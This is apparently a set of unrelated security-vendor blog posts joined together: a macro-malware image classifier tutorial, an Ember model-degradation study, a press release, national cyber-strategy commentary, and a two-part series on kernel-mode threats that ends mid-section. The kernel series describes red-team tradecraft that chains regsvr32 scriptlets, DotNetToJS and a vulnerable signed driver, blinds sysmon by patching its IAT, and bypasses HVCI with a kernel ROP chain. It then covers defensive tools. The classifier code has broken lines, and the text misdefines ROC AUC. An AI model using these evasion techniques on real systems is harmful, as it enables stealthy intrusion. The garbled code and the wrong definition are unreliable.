                                 0.017193749999999994,
                                 255.0],
                        "heur": true},
              "blur": {"data": -1,
                       "heur": false}}},
  "colors": {"cluster_0": {"centroid": [254.7639097744361,
                                        254.7799498746867,
                                        254.58646616541353],
                           "size": 0.9459503713290462},
             "cluster_1": { "centroid": [178.91304347826087,
                                         127.69565217391305,
                                         116.95652173913044],
                            "size": 0.012234456554165144},
             "cluster_2": {"centroid": [247.4512195121951,
                                        234.0609756097561,
                                        186.8780487804878],
                           "size": 0.041815172116788646}},
  "yolo": ["office_1: 97%",
           "office_3: 88%",
           "enable_1: 87%",
           "enable_1: 95%"],
  "txt": "offit attention! to view this document, please turn on the edit mode and macroses! 0 display the contents of the document click on enable content buttorl p aste format painter clipboard security warning font macros have been disabled. enable content\r\n"
}

Building a Classifier

We’ve put a lot of work into this feature generation, so it only makes sense to build a classifier to make predictions on new samples. To do that we generally need three things:

Samples - We’ve collected a corpus through various sources
Feature generator - We’ve documented the creation of several rich feature sets
Labels - We can use our MalwareScore for Macros labels.

Creating Feature Vectors

We’re going to take the easy route in this classifier and not conduct a great deal of processing and analysis on our input feature vectors. A lot of that work was done by the feature generation step, and the rest can be done by the classifier algorithm itself. We take the data from our above json blob and smash it all into one 38-dimensional float vector.

color_centroids = [(d['centroid'], d['size']) for d in list(data['colors'].values())]
color_centroids.sort(key=lambda x: x[1])
color_centroid_vector = []
for cc, s in color_centroids:
    color_centroid_vector.extend(cc)
    color_centroid_vector.append(s)

blank_vector = []
blur_vector = []
for k in ['btm', 'img', 'top']:
    blank_ddata['data'][k]['blank']['data']
    blank_vector.extend()
    blank_vector.append(float(data['data'][k]['blank']['heur']))
    blur = data['data'][k]['blur']['data']
    blur_vector.append(blur)
    blur_vector.append(float(data['data'][k]['blur']['heur']))

yolo_keys = ['enable_1', 'office_1', 'office_2', 'office_3', 'word_logo']
yolo_vector = [0.0, 0.0, 0.0, 0.0, 0.0]
for logo in data['yolo']:
    for yk in yolo_keys:
        if logo.startswith(yk):
            per = float(logo.split(':')[1][1:-1])
            yolo_vector[yolo_keys.index(yk)] = per

text_keys = ['enable content', 'enable macros', 'macros']
text_vector = [0.0] * len(text_keys)
txt = data.get('txt', '')
txt = translator.translate(txt).text
for tk in text_keys:
    if tk in txt:
        text_vector[text_keys.index(tk)] = 1.0

x = np.array(color_centroid_vector + blank_vector + blur_vector + yolo_vector + text_vector)

We use a Random Forest classifier in this example so this step doesn’t matter, but it is good practice to normalize your data to a [0.0, 1.0] scale. This eliminates the correspondence of one feature’s scale to its importance.

import numpy as np
X = np.array(X)
Y = np.array(Y)

high = 1.0
low = 0.0

mins = np.min(X, axis=0)
maxs = np.max(X, axis=0)
rng = maxs - mins
rng = np.array([r if r != 0.0 else 1.0 for r in rng])

X = high - (((high - low) * (maxs - X)) / rng)

Creating, Training, and Evaluating a Classifier

Finally, we create our classifier, train, and evaluate it.

import sklearn.ensemble

n_estimators = 100
max_depth = 6

clf = sklearn.ensemble.RandomForestClassifier(n_estimators=n_estimators, max_depth=max_depth)

for fold in range(nfolds):
    X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=.1)
    clf.fit(X_train, y_train)
    pred_labels_sub = altered_predict(clf, X_test, n_classes)
    pred_vals = [b for (a, b) in clf.predict_proba(X_test)]

    pred_labels.extend(pred_labels_sub)
    y_scores.extend(pred_vals)
    true_labels.extend(y_test)

conf_mat = confusion_matrix(true_labels, pred_labels)
fpr, tpr, thr = roc_curve(true_labels, y_scores)
roc_auc = auc(fpr, tpr)

It is very important to perform cross validation on your dataset as part of the training step to accurately measure your results. We’re using n-fold cross validation, which works by segmenting your data set into n training and evaluation sets. For n=10, we take our entire data set, segment off 10% of it for evaluation, train on the remaining 90%, and then evaluate our hold out set. We repeat this process nine more times, each time picking a different 10% as a hold out. We then aggregate all of our evaluation data to get a very accurate picture of our performance across our entire data set.

import matplotlib.pyplot as plt
plt.plot(fpr, tpr, label='ROC curve of {0} (area = {1:0.2f})'.format('RF', auc))

ROC Curve for SpeedGrapher

The AUC of our ROC curve is a respectable 0.98, even without doing anything fancy for our classifier. Further, we examine our confidence matrix to see our True Positives, True Negatives, False Positives, and False Negatives.

Confusion Matrix

There are 89 false positives in our set, meaning we predict something as malicious when our labels say it is benign. Looking further into these samples we’ve noticed that the majority, around 70%, are actually neutered malware. An example of these neutered samples is below:

Neutered Sample Image

It has a macro text of:

Neutered Sample Macro Text

Our detection based on the visual cues was correct, but our ground truth labeling said the sample was benign because the macro text was removed.

Looking at the false negatives, where we call samples benign but are labeled malicious, we find the majority of samples are those that have no visual indication of being malicious. Since our goal here is to detect samples that visually look malicious, these errors largely are expected.

We also don’t handle well samples in some language character sets.

Different Character Set Example

Some are legitimate looking files, like this resume.

Non-Malicious Looking Example

Unfortunately, Joe Smith is doing some nasty work under the hood:

Malicious Macro Text

All in all, our classifier, even though not sophisticated, performed quite well due to the rich data we were able to gather from using relatively straight forward computer vision analysis.

Next Steps

In reality, this is our initial model for SpeedGrapher, which we will continue to refine. We’re adding new features, new file types, and lots of secret sauce to continue to improve it. But for the purpose of this blog, we wanted to demonstrate how to easily build a classifier and the benefits of having rich, quality input data.

As the threats evolve and become more complicated to detect, we see computer vision as playing a major role in helping every day users guard against phishing and similar attacks, and we will continue to push the boundary and pursue these innovations.

Happy hunting!

Machine learning (ML) models are often designed to make predictions about future data. However, over time many models’ predictive performance decreases as a given model is tested on new datasets within rapidly evolving environments. This is known as model degradation. Model degradation is especially an issue in information security because malware is always changing and new malware is constantly emerging. By understanding model degradation, we can determine how to optimize a model’s predictive performance.

We explored the effects of model degradation on the Ember (Endgame Malware BEnchmark for Research) benchmark model. The ember dataset was initially created as an open source benchmark dataset for testing the efficacy of different machine learning methods, and consists of over 1.1 million executable files/samples, all of which can also be obtained from VirusTotal. Ember also includes a model trained on that data.

While the ember benchmark model classified files as benign or malicious in the original test set with a greater than 99.91% accuracy, we don’t know how the model’s performance will degrade over time as new files (benign and malicious) are classified against an older model. To address this issue, we trained the model with multiple time bounded training and test sets to determine exactly how the benchmark model degrades over time.

After conducting multiple analyses, we determined that the ember model’s predictive performance degrades over time. This helps us make more informed decisions about when to retrain ember and similar models. It will also inform other researchers working with ML models of the importance of model degradation.

Determining Ember Model Degradation

We trained nine versions of the model with different training sets, one for each month from March - November 2017, using all the files seen before and through that month as our training set. For each of these models, we defined multiple testing sets – each test set consisted of all the files from a given month after the training set. We then evaluated each model’s predictive performance on each of the corresponding testing sets based on its area under the ROC curve (AUC) score (a ratio of the model’s false positive rate to its true positive rate).

We did this twice – once with only files first seen in 2017, and once with all files seen starting from 2006. The overall trends in model performance can be seen below.

The heatmaps above are colored by AUC, with red indicating low model performance and blue indicating high model performance. The rows in the heat maps show how a given model performs over time; the columns represent how well multiple training models perform on data from a given month.

Our initial plan was to measure the performance of each model in the months following its latest training data (rows). However, for the model trained on files seen through March (first row), there is no continuous pattern of model degradation. The same lack of a trend applies for the models trained on data through the rest of the nine months. Instead, we switched to a different analysis for evaluating performance degradation, holding the test month constant and comparing time gaps to those test months (columns). Looking at the models tested on data from December (last column), model performance decreases as the latest training data in a given model becomes further away from December. This same general trend can be seen for the rest of the test months.

We believed this difference in model performance could result from later models with larger training sets, which makes them more generalizable and leads to more accurate classifications on the testing sets.

Testing with Normalized Training Data

In order to test the hypothesis that larger datasets over time are driving our findings, we decided to observe how the models perform when the training sets for all the models are the same size. To normalize the training sets for each model, we first determined the number of files in the small training set. Then we selected many randomly sampled files from the rest of the training sets. After retraining/retesting all the models on the new training and test, we observed the following trends in model performance:

While there are few variations, the heatmaps here are essentially the same as the performance heatmaps without the normalized training sets. This indicates that the size of the training set doesn’t contribute to the difference in model performance between each of the nine models.

Considerations and Possible Improvements

While we were able to determine the model’s performance over time, there are other variables that we need to consider. There is a risk that after retraining the model, the model potentially could classify a file differently than it did before retraining. These factors could decrease the consistency of the model and possibly be a concern for people using ember.

Conclusion

Understanding model degradation is important as it allows us to determine when to retrain a model to maintain model performance. We now better understand the rate of model degradation within the ember benchmark model and we can use this knowledge when making decisions about how often to retrain production MalwareScore^TM models.

Beyond malware classification, many ML models are susceptible to model degradation. Thus, any researchers or evaluators in information security using ML models should be aware of the rate of model degradation to continue to optimize model performance.

From the day Endgame shipped its first product, our mission has been to protect the world’s data from attack by simplifying and scaling an organization’s ability to tackle what would otherwise be a daunting cybersecurity challenge. This year has served as witness to how we are delivering on that promise, and we are honored to be recognized for our contributions by the Forbes Cloud 100.

Over the past 12 months we have worked hard to expand our platform capabilities and make it even more accessible for users of any skill level to defend their organizations against threat actors. Over the Summer, we released MalwareScore for macros, a feature that uses machine learning to automatically detect and prevent malware for emerging targets like Microsoft Office macros. We also followed up on the release of Artemis, the world’s first intelligent assistant for cyber defense, with Resolver to simplify how security professionals identify the origin and the extent of a compromise through an attack visualization. We collaborated with the MITRE Corporation to validate the performance of the Endgame platform against the ATT&CK Matrix, and became the first endpoint protection vendor to go beyond the scope of malware-based efficacy against nation-state level attacks. Finally, Endgame championed transparency in security through the release of cutting-edge open source cybersecurity tools including Red Team Automation, Xori and Ember that aim to support the next generation of defenders.

What all of these initiatives have in common is making security attainable to a wider range of professionals in the face of increasingly sophisticated attacks - but we’re not done yet. Endgame is already the standard endpoint protection platform across much of the U.S. federal government, and thanks to our team’s continued technology innovation and focus on ease-of-use, we have seen unprecedented success in the commercial sector as well. Endgame’s commercial customer base has grown fivefold in 2018 alone, across critical industries such as financial services, energy and healthcare.

While Endgame is already a proud advocate of cloud for its scalability and streamlining of processes, we know there is more opportunity to innovate our product to meet the growing demands of organizations that are taking a cloud-first approach. We are committed to continuing to scale and strengthen our platform to ensure Endgame is the last endpoint protection agent our customers will ever need.

We want to say thank you - to our customers for their vote of confidence in our technology, to our incredible team of researchers, engineers and support staff for sharing our vision, and to Forbes, for recognizing our commitment through this award. In the words of Frank Sinatra, “The best is yet to come!”

Recent advancements in OS security from Microsoft such as PatchGuard, Driver Signature Enforcement, and SecureBoot have helped curtail once-widespread commodity kernel mode malware including TDL4 and ZeroAccess. However, advanced attackers have found ways of evading these protections and continue to leverage kernel mode malware to stay one step ahead of the defenders. Kernel mode threats generally have total control over the affected machine, can re-write the rules of the operating system, and can easily tamper with security software.

APT groups realize these benefits and are exploiting them to stay ahead of defenders. In this first of a two-part series stemming from our recent Black Hat talk on kernel mode threats, we will dive deep into the evolution of kernel mode threats and the current state of these attacks. Through thoughtful integration of extant, in the wild exploits and tactics, attackers have access to a range of capabilities that enable more sophisticated and hard to detect kernel mode attacks. Our next post will focus on defending against these attacks, but first it is essential to understand the state of the art of kernel mode threats. Through these two posts, we hope to increase the community’s exposure to these threats and ultimately improve the industry’s defensive posture.

Evolution of Kernel Threats and Platform Protections

Early Kernel Malware

Over 10 years ago, the first truly widespread kernel malware came onto the scene. There were no operating system defenses for these threats at the time, so they flourished. Rustock, TDSS, and ZeroAccess malware families had millions of infections at their peaks. They all shared a similar technique for gaining ring0 execution by infecting existing drivers on disk. They also commonly included rootkit features for hiding files, processes, and network connections from users and security software.

In response to the widespread malware of the late 2000s, Microsoft responded with two technologies that sought to mitigate them. The first was PatchGuard. PatchGuard is designed to detect rootkit-style techniques, such as hooking, and then subsequently crashes the machine. PatchGuard is not perfect and can be bypassed, but it is continually evolving, making it a moving obstacle for attackers.

Microsoft also created another protection - Driver Signature Enforcement or DSE. DSE requires that all drivers are signed by a valid signature before they can be loaded. DSE prevents drivers that have been infected with malware (breaking the digital signature in the process) from loading on the system. It also prevents directly loading unsigned malicious drivers. Both defenses became more important as the market share for 64 bit windows increased.

Bootkit Malware

To evade DSE (and in some cases PatchGuard), malware authors began leveraging Bootkits to get their malware loaded into kernel mode. Bootkits tamper code associated with the early operating system boot process, such as the MBR, VBR, or other OS specific bootloader code.

This includes the original proof of concept eEye BootRoot, along with widespread threats such as Sinowal, TDL4, and XPaj. One interesting aspect of XPaj was its ability to bypass PatchGuard by performing hooks early in the boot process, even before PatchGuard itself was initialized. This meant PatchGuard would implicitly trust the hooks as part of the legitimate code.

The security industry responded to bootkit malware by creating Secure Boot. This technology is baked into the Unified Extensible Firmware Interface (UEFI) specification, and was implemented by Microsoft starting in Windows 8. Secure Boot works by having the UEFI runtime (which is a replacement for legacy BIOS) validate the digital signature of the OS boot loader before executing it.

Any modifications by malware would result in an unbootable PC. Microsoft expanded this approach with Trusted Boot, which works similarly to Secure Boot but continues this signature validation phase throughout the entire boot process. The downside to Secure Boot is that it doesn't protect from compromised firmware, because the firmware is allowed to run before Secure Boot checks. However, technologies like Intel's Boot Guard counter firmware attacks by moving the "root of trust" all the way to an immutable section of the CPU.

Bring Your Own Vuln

While DSE, PatchGuard, and Secure Boot have dramatically reduced the landscape of commodity kernel mode threats, nation-state level threats continue to find creative ways to circumvent these platform protections. APT-level kernel mode malware often installs a legitimate, signed vulnerable driver which is then exploited to gain kernel code execution, thereby side-stepping DSE. Threats such as Uroburos, Derusbi, and Slingshot have all employed this approach. Another notable technique, leveraged by Derusbi and other groups, is to steal legitimate certificates and use them to sign malware drivers.

Even more advanced nation-state level threats, such as Duqu, do not bother with installing and exploiting a vulnerable driver. Instead, they exploit the kernel directly with an 0day. To further evade detection, Duqu hooks the import address table of an installed Kaspersky driver, and tricks the driver into thinking its malicious user process was a trusted Kaspersky process. The Kaspersky driver would then whitelist it completely, as well as prevent it from being terminated by the local users or other malware. For actual persistence, Duqu dropped a driver implant to disk in the network DMZ. This driver was signed with a stolen Foxconn certificate. This implant serves as a gateway into the entire network as it could redirect network traffic to any internal destination.

DOUBLEPULSAR is also worth a strong mention. It is a very lightweight kernel mode implant that lives only in memory; it has no reboot persistence. It is typically loaded onto a system using a remote ring0 exploit such as ETERNALBLUE. DOUBLEPULSAR allows attackers with stealthy remote access onto the system by hooking a function pointer in the SMBv1 driver (srv.sys). At the time, this function pointer was not monitored by PatchGuard. From there it allows attackers to load more kernel mode code, or inject a full featured payload into user mode. It became a widespread threat after it was leaked and picked up by other adversaries, such as in the WannaCry and NotPetya attacks.

To mitigate from attackers who exploit their way to kernel mode, MS released Virtualization Based Security or VBS. With VBS, the kernel is sandboxed by the hypervisor and no longer has complete control over the system.

Hypervisor Code Integrity (HVCI) extends VBS and requires all kernel code be signed. Furthermore, kernel memory is no longer allowed to be both writable and executable (known as W^X). HVCI stops many kernel mode threats such as Turla Driver Loader (discussed in our next post) and DOUBLEPULSAR. Credential Guard also leverages the hypervisor to protect credentials from tools like mimikatz.

Looking Ahead

The mitigations discussed thus far are only a prominent subset of the kernel mitigations that Microsoft has implemented in the last 10 years, and they have significantly increased investment against these threats in more recent OS versions (especially Win10). However, market share remains a major concern. A large user base is still running Win7, and many organizations that have upgraded to Win10 are not yet leveraging the most advanced kernel protections. Because these protections are still not widely implemented, attackers will continue to pursue low cost kernel attacks.

So what can be done to protect against kernel mode threats? In our next post, we will present our latest research on offensive tradecraft, which directly informs how we protect against these threats. This includes the role of red and blue exercises, hunting, and real-time protections. Although kernel mode threats will continue to evolve, the state of the art in malware detection has also advanced to hinder these new kernel mode threats. Next, we will equip you with new detections and insights to stay a step ahead of evolving kernel mode threats.

The release of the National Cyber Strategy (NCS) yesterday marks the culmination of multiple new cyber policy directives and strategic documents. From the continuous engagement described in the Command Vision for US Cyber Command to rescinding Presidential Policy Directive 20 to the Department of Homeland Security Cybersecurity Strategy, there is obvious momentum for the modernization of cyber strategy. The NCS is notable both for its continuity with previous strategies as well as for some significant pivots. As is true with all strategies, the key to modernizing cyber policy now relies on implementation.

Reasserting American Leadership to Preserve a Free and Open Internet

At a time when malicious cyber-enabled activity is targeting democracies across the globe, the NCS reaffirms not only American commitment to a free and open internet, but also American global leadership “ to ensure that our approach to an open Internet is the international standard.” In this regard, the NCS reflects continuity with previous strategies with the focus on international cooperation and the promotion of the multi-stakeholder model for a free and open internet that protects privacy and civil liberties. It also is a counterpunch to China’s global push for cyber sovereignty and China Standards 2035, including technical standards across industries.

Elevating the Private Sector

The NCS also provides meaningful distinction from other strategic documents. First, this strategy arguably has as much focus on the private sector as the public. This is most evident in the frequent discussion of collaboration with like-minded entities, including information sharing as well as protecting critical infrastructure. However, a key priority within the strategy is to “clarify the roles and responsibilities of Federal agencies and the expectations on the private sector related to cybersecurity risk management and incident response.” Instead of the current patchwork policies – such as different breach notification laws for each state – this may mean a more coherent and transparent approach to private/public sector protections and responses.

The NCS also addresses the need to incentivize robust cybersecurity investments, greater adaptability within infrastructure, and more secure supply chains. Discussions on fostering incentives for improved security usually allude to tax incentives. As more details on implementation become clear, it is notable to see a broader approach and new strategy that may offer ‘carrots’ for responsible cybersecurity.

Also of note for the private sector is a modernization of laws and infrastructure. The NCS prioritizes the modernization of electronic surveillance and computer crime laws, the latter of which may allude to the long overdue updating of the thirty-year old Computer Fraud and Abuse Act. The NCS also highlights the role of automation and data analytics, including leveraging commercial-off-the-shelf capabilities. Each of these areas may also present opportunities for the private sector.

Much Ado About Offense?

Finally, following the rescinding of PPD-20 and the release of this week’s Department of Defense Cyber Strategy, there has been much consternation over a potential green light for unconstrained offensive cyber. It certainly is true that the administration is transitioning from a reactive to a proactive approach to counter malicious cyber activity. However, claiming unfettered offensive cyber authorities is an oversimplification of an extremely complex challenge in the same way that ‘pew pew maps’ (i.e., a hodgepodge of directed laser beams scattered across a global map) oversimplify the cyber threat landscape. It makes for great eye candy and sound bites but distracts from the core message.

The NCS is definitely stronger in a focus on actively countering malicious cyber activity than previous strategies, but it balances cost imposition and deterrence. That is, it balances offense and defense, while focusing on peace through strength. In fact, the NCS places much of this discussion largely within the norms framework. Offensive cyber is not even referenced within the NCS. Instead, the NCS focuses on the integration of cyber with all instruments of national power to counter the threats. It definitely is a stronger, more proactive approach, but it also is a strong counter to concerns of unfettered offensive cyber authorities.

Implementing Change

Of course, with every strategy, the key is implementation. The NCS, and other recent strategic documents, lay a solid foundation for strengthening democracy and preserving a free and open internet through collaboration with allies and the private sector, while countering and imposing costs on adversaries. However, their efficacy rests largely on the implementation of these core priorities. For example, there has been a handful of proposed, bipartisan election security legislation that simply has not progressed in Congress. If the NCS and other strategic documents are truly going to instigate greater protection, deterrence, and building resilience, the same sense of urgency must now resonate across the government and within the private sector to structure a viable roadmap to achieve the vision.

In our last post, we described the evolution of kernel mode threats. These remain a prominent mode of compromise for nation-state attackers, as they are difficult to detect and enable robust persistence. Despite advances in platform protections, kernel mode threats continue to evolve and have been employed in many high profile attacks, such as WannaCry and NotPetya. What can organizations do to protect against kernel mode threats? Fortunately, the state of the art in defense also has evolved to counter this impactful attack trend.

Our own offensive tradecraft research informs our approach to improving defenses from kernel threat vectors. We will first cover our own research which evolved from Red versus Blue exercises, as well as detail deeper analysis into evading current platform protections. With the state of the art in offensive tradecraft established, we will then discuss several approaches to defending against kernel mode threats. We will also introduce two open source tools to help defend against kernel mode threats. Some are fast wins, while others involve hunting and establishing real-time protections. And in all cases, we still highly recommend upgrading to the latest Windows 10 and enable as many protections as feasible in your organization.

Offensive Tradecraft Research

To test and push the boundaries of our defenses, it is essential to comprehend the state of the art in offensive tradecraft. During an internal red vs blue, we first explored leveraging kernel mode malware to evade endpoint security products and the most commonly deployed kernel protections (such as Driver Signature Enforcement). Next, we investigated methods for evading the most advanced kernel protections such as Virtualization Based Security (VBS) and Hypervisor Code Integrity (HVCI).

Red vs. Blue

Endgame periodically conducts internal Red vs Blue exercises to test our product and team’s skills. The Red Team is tasked with emulating adversaries of varying sophistication levels. This includes everything from very noisy commodity malware to mid and upper tier APTs. Typically, those of us on the Red Team try to stay stealthy with the latest user-mode in-memory techniques. However, our Blue Team is constantly upping their game and and became increasingly efficient at zeroing in our user mode injection techniques. We decided to pursue kernel-mode in memory techniques to raise the bar.

Turla Driver Loader (TDL) was a key piece of our kernel tradecraft. TDL is an open source implementation of the Turla/Uroburos driver loading technique. In a nutshell, it will load a vulnerable VirtualBox driver. From there, the VirtualBox driver is exploited to load and execute arbitrary kernel shellcode. TDL is built with shellcode that leverages a technique like "MemoryModule" in user mode to manually map an arbitrary driver and call its entry point. Using TDL helps the Red Team achieve two objects: evade driver signature enforcement and never write our driver to disk on the target machine.

We had some other high level design goals for the implant. First, we wanted to avoid any user mode components. A very typical design is to use a kernel mode component which injects into a user mode process for performing the primary "implant" functions. The kernel mode malware referenced in these two posts have some user mode components. Avoiding user mode is more time consuming for basic features, but we felt it would be worth it. Injecting anything into user mode would have a high chance of getting caught by our Blue Team. This required us to do our network command and control from kernel mode. We chose Winsock Kernel (WSK) as our networking choice because it is very well documented, has great sample code, and presents a relatively easy interface for doing network communications from the kernel.

To further confuse our Blue Team, we did not want a beacon style implant. Beaconing is by far the most popular technique for malware and we knew it was something they would be looking for on the range. Our initial port opening concept unfortunately could be detected easily. We settled on a more stealthy approach by re-using the DoublePulsar function pointer hook trick to hijack some existing kernel socket. However, we didn't want to leverage the same hook point, expecting it to now be monitored by PatchGuard. After digging around in various stock network enabled drivers we settled on the srvnet driver which opens port 445. Our driver egg hunts to locate and hook srvnet’s WskAccept function with our own accept function. This allows our implant to selectively hijack port 445 traffic.

Leveraging TDL meant that our kernel driver would never touch disk, however there was still a high risk that the loader itself could be caught. As a result, we wanted to ensure the loading process itself was as fileless as possible. This meant starting the chain with either PowerShell or JavaScript. We opted for JS due to generally less visibility for defenders. Instead of launching cscript/wscript itself, we used the squiblydoo technique to run a scriptlet from a regsvr32 process. For our actual Black Hat demo (below), we updated this to use SquiblyTwo and the winrm.vbs evasion technique.

From here, we used DotNetToJS to load/execute an arbitrary .NET executable from JavaScript. We could have exploited and loaded our driver from this .NET executable, but the code for doing this was already written in C. The easier option was to use a MemoryModule style .NET loader to then load and execute the native executable. The native executable (TDL) would then load the vulnerable VirtualBox driver, and exploit it to load and map our implant driver into memory. In this whole process, the only executable that truly touched disk in native form was the legitimate VirtualBox driver.

Demo 1: Fileless Kernel Mode

Evading VBS/HVCI

When we were accepted to present at Black Hat, we wanted to push the bounds of our offensive tradecraft. Currently, Microsoft's Virtualization Based Security (VBS) combined with Hypervisor Code Integrity (HVCI) will block any unsigned code from ever running in the kernel. This includes DoublePulsar and the implant we wrote for our RvB exercise.

We first identified a vulnerable driver because the VirtualBox driver from TDL won’t load while HVCI is enabled. There is virtually an unlimited supply of vulnerable drivers. We grabbed a known-vulnerable sample from Parvez Anwar's site. Since we had the option to choose the vulnerability brought to the endpoint, we chose an easy to exploit write-*what-where vulnerability, as opposed to a more difficult one like a static one byte write. The latter would typically involve some pool corruption (like win32k GDI object) to achieve a full read/write primitive. Since the vulnerable driver would dereference a user-supplied pointer when doing the overwrite, it also gave us a handy arbitrary read primitive.

HVCI prevents unsigned code from running in the kernel. However, it does nothing to protect the integrity of kernel mode data. Tampering with key data structures can significantly compromise system integrity. For example, attackers can "NOP" out certain function calls by modifying the IAT. They can disable EDR kernel to user communications or security focused kernel Etw providers such as Microsoft-Windows-Threat-Intelligence. Data corruption attacks also can be leveraged to elevate privileges by modifying tokens or handles; many other techniques are possible.

To explore real world implications of this, we examined the sysmon driver’s method for sending events from kernel mode to user mode for logging. We found that if we modified the IoCsqRemoveNextIrp pointer in the Import Address Table (IAT) to a xor rax,rax ret gadget, events would no longer be logged. A real world attacker could selectively drop events to avoid raising suspicion. It's worth pointing out this is not in any way a flaw in sysmon, as likely every security product is vulnerable to data corruption attacks like this. However, Microsoft could potentially expand VBS to protect certain data regions which should not be modified (such as the IAT in this example).

While data corruption attacks do their part keeping us up at night, we wanted to explore if it was possible to still achieve arbitrary code execution. A talk from Microsoft’s Dave Weston at BlueHat IL provided excellent detail into the design of VBS. However, it also clued us into a gap in the current approach with regard to rear edge control flow guard. Essentially, it is still open season for return oriented programming (ROP) attacks in the Windows kernel.

As mentioned by Peter Hlavaty’s 2015 recon talk, a read-write primitive can be abused to perform stack hooking to achieve code execution via ROP. We were interested in weaponizing this technique against a HVCI hardened system. We created a surrogate thread as our hooking target. From there, our PoC would dynamically build a ROP chain based on the number of parameters in the target function. It only required 10 gadgets to achieve a full N-argument function call primitive. In the next step, we exploited the signed and vulnerable driver to corrupt the kernel stack of the surrogate thread in order to execute the generated ROP chain. The end result is our PoC could call any arbitrary kernel mode function. In one example, attackers could leverage this to inject into protected user mode processes and be largely invisible to AV/EDR. The video below demonstrates how to bypass HVCI using this technique.

NTSTATUS WPM(DWORD_PTR targetProcess, DWORD_PTR destAddress, void * pBuf, SIZE_T Size)
{
    SIZE_T Result;
    DWORD_PTR srcProcess = CallFunction("PsGetCurrentProcess");

    LONG ntStatus = CallFunction("MmCopyVirtualMemory", srcProcess, 
        (DWORD_PTR)pBuf, targetProcess, destAddress, Size, KernelMode, (DWORD_PTR)&Result);

    return ntStatus;
}

Demo 2: Evading Hypervisor Code Integrity

Defending Against Kernel Mode Threats

First and foremost, the simplest thing you can do to defend your enterprise from kernel mode threats is to ensure that you are eventing on driver loads. There are readily-available tools to do this, including SysInternals Sysmon and Windows Defender Application Control in audit mode. You should be looking for low-prevalence and known-exploitable drivers. It’s important to build a baseline if possible. As many of you know, you have to understand your company's assets and infrastructure before you can begin looking for adversaries. The same applies for understanding the exposure of kernel modules throughout your organization.

If possible, defenders should deploy hypervisor code integrity policies to block most legacy drivers. Ideally, you should be whitelisting driver publishers, but maintaining effective whitelists can be very hard. At a minimum, you should mandate WHQL signatures on all drivers. To get a WHQL signature, you have to upload your driver to Microsoft. This theoretically mitigates the threat of stolen certificates because attackers can no longer stealthily sign their malware. However, WHQL is not a panacea. For example, the driver we exploited to evade HVCI is WHQL signed.

Additionally, defenders can supplement code integrity policies with blacklisting of known-exploitable drivers. Starting with Windows 10 Redstone 5, Microsoft will block many known-exploitable drivers by default if HVCI is enabled. This is great for some users, but it doesn’t help those who are running earlier versions of Windows, or who are on Redstone 5 but can’t enable HVCI.

Open Source Defense: Kernel Attack Surface Reduction (KASR)

To help mitigate the risk of these forever-days for the rest of the world, we released KASR, a free tool which blocks a list of known-exploitable drivers. KASR adds a roadblock for unsophisticated attackers re-using known exploits. We understand that blacklisting does not scale. It will not prevent attackers who know how to find and exploit vulnerabilities in kernel drivers, but we hope that it will at least stop script kiddies from rampaging around in the kernel. Microsoft is in the process of finalizing their RS5 driver blacklist. When it is complete, we will incorporate it into a future version of KASR.

Kernel Hunting

Looking back at our RvB, we realized that we needed a better way to hunt for kernel mode threats like DoublePulsar and our fileless implant. Traditional forensic-style techniques involve full memory acquisition and offline analysis, which are both time and bandwidth-intensive. This approach doesn’t scale. To address this problem, we leveraged the same techniques to acquire kernel memory, but instead did the analysis on the endpoint, similar to what "blackbox" rootkit scanners have done for years. This means we can complete a scan in milliseconds.

There are several techniques available to read physical memory on a Windows machine, including the PhysicalMemory device and MDL-based APIs. One of our favorites was Page Table Entry Remapping (shown above) due to its simplicity and performance.

Our goal was to generically detect DoublePulsar as it laid dormant, without signatures. We could have scanned through kernel pool/heap memory looking for shellcode-like memory blobs. Unfortunately on Windows 7, the entire NonPagedPool is executable, leaving a fairly large search space, which seemed prone to false positives. Instead, we focused on identifying the function pointer hook. The first trick is to identify where function pointers exist in memory. Function pointers are absolute addresses, which means that they need to be relocated if the image is relocated. Thus, to find function pointers, we walk the PE relocation tables of all loaded drivers. Next, we check to see if the relocated value points to an executable section of the driver in the original on-disk copy. Then we check if it is outside of any loaded driver in memory. Finally, if the unbacked memory region it points to is executable, we consider this a hit. This technique detects both DoublePulsar and the socket handler hook installed by our kernel mode implant. We released Marta, a free tool that leverages this technique to scan all drivers on the system (typically in milliseconds) and will identify any active infections. We named it Marta after Marta Burgay, the first astronomer to discover a real life double pulsar. Demo 3 in the following section shows Marta quickly identifying a dormant DoublePulsar infection.

Realtime Protections

On-demand scans are great, but we wanted to take this a step further and see if we could catch, and potentially stop, these types of attacks in real time (before any damage is done). Having worked on Endgame’s HA-CFI™ product, we are familiar with the Performance Monitoring Unit, or PMU, present on most modern CPUs. The PMU is a component of the CPU that can be programmed to count the number of times specific low-level events occur on each core. In this case, we're using indirect near call branch mispredictions. When one of these events occurs, the PMU generates an interrupt, which executes our interrupt service routine. In this routine, we have a chance to validate and enforce a policy. The video below demonstrates our real-time approach to detecting DoublePulsar as a system is infected.

Demo 3: Detecting DOUBLEPULSAR

To detect unbacked code execution, we keep a list of memory ranges corresponding to the loaded drivers, and validate that the instruction pointer resides within one of those ranges. However, our proof of concept suffers from a few weaknesses, including the fact that PatchGuard itself uses unbacked pages in an attempt to hinder reverse engineering. While it’s fun to catch PatchGuard, this false positive would need to be addressed in a reliable and robust manner, which is difficult given the fact that PatchGuard is undocumented and subject to change at any time. Another weakness is that kernel code has the ability to program the PMU. An attacker with knowledge of this system could reprogram the PMU or disable interrupts. Finally, as with all kernel drivers, this unbacked detection driver is vulnerable to data attacks, such as IAT patching or attacks on our policy structures.

As we mentioned earlier, there are currently no kernel protections against ROP (rear flow CFG). Microsoft’s plan to defend against ROP requires Intel Control-flow Enforcement Technology (CET). While promising, CET doesn’t exist in any production processor today.

To cover this gap, we propose a PMU-based protection system that can detect rear flow control flow policy violations. We can configure the CPU’s Last Branch Recorded (LBR) mechanism to record every return in the kernel into a circular buffer. We can generate a control flow policy by scanning all the loaded drivers and identifying call instructions. Immediately after these call instructions are their corresponding return sites. The policy we generate is a bitmap listing these valid return sites. We generate policy at startup, and update it as new drivers are loaded.

